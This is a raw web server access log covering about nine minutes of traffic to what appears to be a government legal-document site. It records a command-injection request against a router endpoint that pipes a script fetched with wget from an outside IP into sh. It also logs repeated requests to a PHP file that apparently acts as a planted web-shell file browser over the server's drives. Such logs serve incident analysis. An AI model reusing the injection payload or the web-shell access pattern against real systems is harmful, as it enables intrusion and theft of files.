201.245.192.253 - - [20/Jun/2024:01:51:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.120.97 - - [20/Jun/2024:01:51:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Creq%5Cfonts%5C&f=glyphicons-halflings-regular.woff&ft=notepad&white=1 HTTP/1.1" 200 23320
201.245.192.253 - - [20/Jun/2024:01:52:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:52:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.119.195 - - [20/Jun/2024:01:52:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1869.pdf&ft=notepad&white=1 HTTP/1.1" 200 421577
47.128.96.196 - - [20/Jun/2024:01:53:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1673.pdf&ft=notepad&white=1 HTTP/1.1" 200 20169
185.191.127.212 - - [20/Jun/2024:01:53:27 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
216.245.221.92 - - [20/Jun/2024:01:53:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:01:53:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:01:53:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:53:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
148.153.45.234 - - [20/Jun/2024:01:54:04 -0500] "GET /sQa7 HTTP/1.1" 404 1018
148.153.45.234 - - [20/Jun/2024:01:54:04 -0500] "GET /NvML HTTP/1.1" 404 1018
148.153.45.234 - - [20/Jun/2024:01:54:04 -0500] "GET /aab8 HTTP/1.1" 404 1018
148.153.45.234 - - [20/Jun/2024:01:54:05 -0500] "GET /jquery-3.3.1.slim.min.js HTTP/1.1" 404 1018
148.153.45.234 - - [20/Jun/2024:01:54:06 -0500] "GET /aab9 HTTP/1.1" 404 1018
148.153.45.234 - - [20/Jun/2024:01:54:07 -0500] "GET /jquery-3.3.2.slim.min.js HTTP/1.1" 404 1018
47.128.36.56 - - [20/Jun/2024:01:54:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0741.pdf&ft=img&white=1 HTTP/1.1" 200 20239
201.245.192.253 - - [20/Jun/2024:01:54:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:54:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.117.89 - - [20/Jun/2024:01:54:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=2529.pdf&ft=notepad HTTP/1.1" 200 265929
201.245.192.253 - - [20/Jun/2024:01:55:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.117.119 - - [20/Jun/2024:01:55:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=admin.php&ft=img&white=1 HTTP/1.1" 200 10730
201.245.192.253 - - [20/Jun/2024:01:55:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [20/Jun/2024:01:54:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.57.155 - - [20/Jun/2024:01:56:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5Csistemas%5C&f=bann.gif&white=1 HTTP/1.1" 200 21935
201.245.192.253 - - [20/Jun/2024:01:56:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:01:56:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.223 - - [20/Jun/2024:01:56:49 -0500] "GET /Publicaciones/2023EE244393.pdf HTTP/1.1" 404 228
47.128.57.166 - - [20/Jun/2024:01:57:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3265.pdf&ft=notepad&white=1 HTTP/1.1" 200 384713
172.22.2.4 - - [20/Jun/2024:01:55:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [20/Jun/2024:01:57:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:01:57:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.37.251 - - [20/Jun/2024:01:57:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2683.pdf&ft=notepad&white=1 HTTP/1.1" 200 372425
201.245.192.253 - - [20/Jun/2024:01:58:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [20/Jun/2024:01:58:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:01:58:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.57.121 - - [20/Jun/2024:01:58:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2469.pdf&ft=notepad&white=1 HTTP/1.1" 200 368329
201.245.192.253 - - [20/Jun/2024:01:58:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
165.227.232.49 - - [20/Jun/2024:01:59:10 -0500] "" 400 226
47.128.33.39 - - [20/Jun/2024:01:59:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=2290.pdf&ft=img&white=1 HTTP/1.1" 200 429839
201.245.192.253 - - [20/Jun/2024:01:59:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:01:59:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.122.179 - - [20/Jun/2024:02:00:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ckmz%5C&f=vallas_otorgadas_Octubre2014.kmz&ft=notepad&white=1 HTTP/1.1" 200 20145
201.245.192.253 - - [20/Jun/2024:02:00:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:00:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.9 - - [20/Jun/2024:02:00:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1088.pdf HTTP/1.1" 200 361647
47.128.123.63 - - [20/Jun/2024:02:00:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000249.tif&ft=notepad HTTP/1.1" 200 32220
216.244.66.195 - - [20/Jun/2024:02:00:48 -0500] "GET /BLA/resoluciones/AUTOS%202020/04656.pdf HTTP/1.1" 200 2775588
